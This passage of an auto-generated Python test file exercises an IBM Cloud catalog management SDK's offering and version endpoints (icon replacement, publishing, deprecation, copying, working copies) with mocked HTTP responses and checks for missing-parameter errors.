        test_replace_offering_icon_value_error()

        Each required parameter set to None must raise ValueError.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/icon/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'
        file_name = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "offering_id": offering_id,
            "file_name": file_name,
        }
        for param in req_param_dict:
            # Equality, not identity: 'is' on strings is fragile.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.replace_offering_icon(**req_copy)
class TestUpdateOfferingIbm():
    """
    Test Class for update_offering_ibm
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are turned into a regex mock so
        # that requests with or without the trailing slash both match.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_update_offering_ibm_all_params(self):
        """
        update_offering_ibm()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/publish/allow_request/true')
        mock_response = '{"allow_request": false, "ibm": false, "public": true, "changed": false}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'
        approval_type = 'allow_request'
        approved = 'true'

        # Invoke method
        response = _service.update_offering_ibm(
            catalog_identifier,
            offering_id,
            approval_type,
            approved,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_update_offering_ibm_value_error(self):
        """
        test_update_offering_ibm_value_error()

        Each required parameter set to None must raise ValueError.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/publish/allow_request/true')
        mock_response = '{"allow_request": false, "ibm": false, "public": true, "changed": false}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'
        approval_type = 'allow_request'
        approved = 'true'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "offering_id": offering_id,
            "approval_type": approval_type,
            "approved": approved,
        }
        for param in req_param_dict:
            # Equality, not identity: 'is' on strings is fragile.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.update_offering_ibm(**req_copy)
class TestGetOfferingUpdates():
    """
    Test Class for get_offering_updates
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are turned into a regex mock so
        # that requests with or without the trailing slash both match.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_offering_updates_all_params(self):
        """
        get_offering_updates()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/updates')
        mock_response = '[{"version_locator": "version_locator", "version": "version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "package_version": "package_version", "can_update": true, "messages": {"mapKey": "inner"}}]'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'
        kind = 'testString'
        version = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        resource_group_id = 'testString'
        namespace = 'testString'

        # Invoke method
        response = _service.get_offering_updates(
            catalog_identifier,
            offering_id,
            kind,
            version=version,
            cluster_id=cluster_id,
            region=region,
            resource_group_id=resource_group_id,
            namespace=namespace,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params: decode the query string, then confirm each
        # optional parameter was serialized onto the request URL.
        query_string = responses.calls[0].request.url.split('?',1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'kind={}'.format(kind) in query_string
        assert 'version={}'.format(version) in query_string
        assert 'cluster_id={}'.format(cluster_id) in query_string
        assert 'region={}'.format(region) in query_string
        assert 'resource_group_id={}'.format(resource_group_id) in query_string
        assert 'namespace={}'.format(namespace) in query_string

    @responses.activate
    def test_get_offering_updates_required_params(self):
        """
        test_get_offering_updates_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/updates')
        mock_response = '[{"version_locator": "version_locator", "version": "version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "package_version": "package_version", "can_update": true, "messages": {"mapKey": "inner"}}]'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'
        kind = 'testString'

        # Invoke method
        response = _service.get_offering_updates(
            catalog_identifier,
            offering_id,
            kind,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params: only the required 'kind' must be present.
        query_string = responses.calls[0].request.url.split('?',1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'kind={}'.format(kind) in query_string

    @responses.activate
    def test_get_offering_updates_value_error(self):
        """
        test_get_offering_updates_value_error()

        Each required parameter set to None must raise ValueError.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/updates')
        mock_response = '[{"version_locator": "version_locator", "version": "version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "package_version": "package_version", "can_update": true, "messages": {"mapKey": "inner"}}]'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'
        kind = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "offering_id": offering_id,
            "kind": kind,
        }
        for param in req_param_dict:
            # Equality, not identity: 'is' on strings is fragile.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_offering_updates(**req_copy)
# endregion
##############################################################################
# End of Service: Offerings
##############################################################################
##############################################################################
# Start of Service: Versions
##############################################################################
# region
class TestGetOfferingAbout():
    """
    Test Class for get_offering_about
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are turned into a regex mock so
        # that requests with or without the trailing slash both match.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_offering_about_all_params(self):
        """
        get_offering_about()
        """
        # Set up mock (this endpoint returns markdown, not JSON)
        url = self.preprocess_url(_base_url + '/versions/testString/about')
        mock_response = '"operation_response"'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='text/markdown',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.get_offering_about(
            version_loc_id,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_offering_about_value_error(self):
        """
        test_get_offering_about_value_error()

        Each required parameter set to None must raise ValueError.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/about')
        mock_response = '"operation_response"'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='text/markdown',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict:
            # Equality, not identity: 'is' on strings is fragile.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_offering_about(**req_copy)
class TestGetOfferingLicense():
    """
    Test Class for get_offering_license
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are turned into a regex mock so
        # that requests with or without the trailing slash both match.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_offering_license_all_params(self):
        """
        get_offering_license()
        """
        # Set up mock (this endpoint returns plain text, not JSON)
        url = self.preprocess_url(_base_url + '/versions/testString/licenses/testString')
        mock_response = '"operation_response"'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='text/plain',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        license_id = 'testString'

        # Invoke method
        response = _service.get_offering_license(
            version_loc_id,
            license_id,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_offering_license_value_error(self):
        """
        test_get_offering_license_value_error()

        Each required parameter set to None must raise ValueError.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/licenses/testString')
        mock_response = '"operation_response"'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='text/plain',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        license_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
            "license_id": license_id,
        }
        for param in req_param_dict:
            # Equality, not identity: 'is' on strings is fragile.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_offering_license(**req_copy)
class TestGetOfferingContainerImages():
    """
    Test Class for get_offering_container_images
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_offering_container_images_all_params(self):
        """
        get_offering_container_images()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/containerImages')
        mock_response = '{"description": "description", "images": [{"image": "image"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.get_offering_container_images(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_offering_container_images_value_error(self):
        """
        test_get_offering_container_images_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/containerImages')
        mock_response = '{"description": "description", "images": [{"image": "image"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_offering_container_images(**req_copy)
class TestDeprecateVersion():
    """
    Test Class for deprecate_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_deprecate_version_all_params(self):
        """
        deprecate_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/deprecate')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.deprecate_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_deprecate_version_value_error(self):
        """
        test_deprecate_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/deprecate')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.deprecate_version(**req_copy)
class TestAccountPublishVersion():
    """
    Test Class for account_publish_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_account_publish_version_all_params(self):
        """
        account_publish_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/account-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.account_publish_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_account_publish_version_value_error(self):
        """
        test_account_publish_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/account-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.account_publish_version(**req_copy)
class TestIbmPublishVersion():
    """
    Test Class for ibm_publish_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_ibm_publish_version_all_params(self):
        """
        ibm_publish_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/ibm-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.ibm_publish_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_ibm_publish_version_value_error(self):
        """
        test_ibm_publish_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/ibm-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.ibm_publish_version(**req_copy)
class TestPublicPublishVersion():
    """
    Test Class for public_publish_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_public_publish_version_all_params(self):
        """
        public_publish_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/public-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.public_publish_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_public_publish_version_value_error(self):
        """
        test_public_publish_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/public-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.public_publish_version(**req_copy)
class TestCommitVersion():
    """
    Test Class for commit_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_commit_version_all_params(self):
        """
        commit_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/commit')
        responses.add(responses.POST,
                      url,
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.commit_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_commit_version_value_error(self):
        """
        test_commit_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/commit')
        responses.add(responses.POST,
                      url,
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.commit_version(**req_copy)
class TestCopyVersion():
    """
    Test Class for copy_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_copy_version_all_params(self):
        """
        copy_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/copy')
        responses.add(responses.POST,
                      url,
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        tags = ['testString']
        target_kinds = ['testString']
        content = b'This is a mock byte array value.'

        # Invoke method
        response = _service.copy_version(
            version_loc_id,
            tags=tags,
            target_kinds=target_kinds,
            content=content,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params; binary content is base64-encoded in the JSON body.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['tags'] == ['testString']
        assert req_body['target_kinds'] == ['testString']
        assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='

    @responses.activate
    def test_copy_version_required_params(self):
        """
        test_copy_version_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/copy')
        responses.add(responses.POST,
                      url,
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.copy_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_copy_version_value_error(self):
        """
        test_copy_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/copy')
        responses.add(responses.POST,
                      url,
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.copy_version(**req_copy)
class TestGetOfferingWorkingCopy():
    """
    Test Class for get_offering_working_copy
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_offering_working_copy_all_params(self):
        """
        get_offering_working_copy()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/workingcopy')
        mock_response = '{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.get_offering_working_copy(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_offering_working_copy_value_error(self):
        """
        test_get_offering_working_copy_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/workingcopy')
        mock_response = '{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_offering_working_copy(**req_copy)
class TestGetVersion():
    """
    Test Class for get_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_version_all_params(self):
        """
        get_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString')
